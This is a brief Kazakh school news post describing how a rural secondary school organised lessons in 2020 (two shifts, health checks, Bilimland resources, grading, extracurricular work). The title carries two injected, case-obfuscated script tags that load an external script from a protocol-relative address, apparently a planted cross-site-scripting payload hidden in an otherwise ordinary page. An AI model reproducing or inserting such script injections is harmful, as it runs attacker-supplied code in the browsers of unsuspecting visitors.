Мектепте оқу процесін ұйымдастыру<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
23.09.2020
«Ғ.Әбдірахманұлы атындағы Қима орта мектебі» КММ-інде штаттық режимде 2 ауысымда оқушылар білім алуда. Сыныптар бекітілген кабинеттерде оқыйды, үзілістер 2,4,6 сабақтардан кейін 10 минуттан. Мектепке кіру кезінде білім алушылардың температурасы өлшенеді, кабинеттерді желдету, кварцтау және ылғалды тазалау режимдері күнделікті жүргізіледі.
Мұғалімдер сабақта Bilimland платформасының ресурстарын қолданады.



Оқушылардың күнделікті пәндерден білімі баллдық жүйемен бағаланады.


Шәкірттеріміздің өзіндік жұмыс істеу қызметін ұйымдастыруда атқарылып жатқан іс-шаралар: сабақтардан тыс уақыттарда телеарналық сабақтар бойынша тақырыптарды қайталау, әдеби шығармаларды оқып мазмұндау, қашықтықтан өткізіліп жатқан іс-шараларға, олимпиадаларға, сайыстарға, байқауларға қатысу.


Тулегенова К.